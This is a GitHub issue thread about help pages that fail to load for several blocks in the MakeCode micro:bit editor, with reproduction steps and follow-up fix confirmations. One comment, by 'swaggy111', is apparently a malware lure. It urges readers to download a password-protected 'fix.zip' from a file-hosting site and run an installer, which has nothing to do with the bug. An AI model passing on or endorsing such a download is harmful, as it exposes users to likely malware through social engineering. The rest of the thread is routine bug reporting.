### ISSUE TITLE
Pins block: -"digital pin[P0]" and "analog pin [P0]" could not load the help documentation.

### ISSUE THREAD

**Issue by Ramanan0530** [microsoft/pxt-microbit#5859]
**Describe the bug**
Pins block:-"**digital pin[P0]**" and "**analog pin [P0]**" could not load the help documentation.
 
**Steps to reproduce the behavior**
1.Navigate to https://makecode.microbit.org/beta
2. Open any project and hover mouse to **Toolbox**
3. Select **pins block** and **click more**
4. Click and **observe** the **"digital pin[P0]" & "analog pin [P0]** blocks
 
**Actual behavior**
The document shows" **Could not load the documentation**" when click help.
**Expect behavior**
The help document should load successfully

**Screen Recording:** 
![Pin](https://github.com/user-attachments/assets/c900310f-0c6e-448b-991f-140f9aa3c5c7)

**Additional context**
1.OS: Windows, iPad, Mac
2.Browser: Safari, Chrome, Edge, Firefox
3.makecode.microbit,org version: 7.0.25
4.Microsoft MakeCode version: 10.2.15

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ramanan0530** [comment]
This bug also reproduces in Text -> **char code from text**'

**Comment by Ramanan0530** [comment]
Hi, @abchatra I verified this bug in the latest version:7.0.35 and **_analogPin()** and _**digitalPin()** have been **fixed.**
But the block **char code from "this" at 0** still **cannot show** the related help document.

**Comment by abchatra** [comment]
This is fixed apart from char code from "this" at (0)
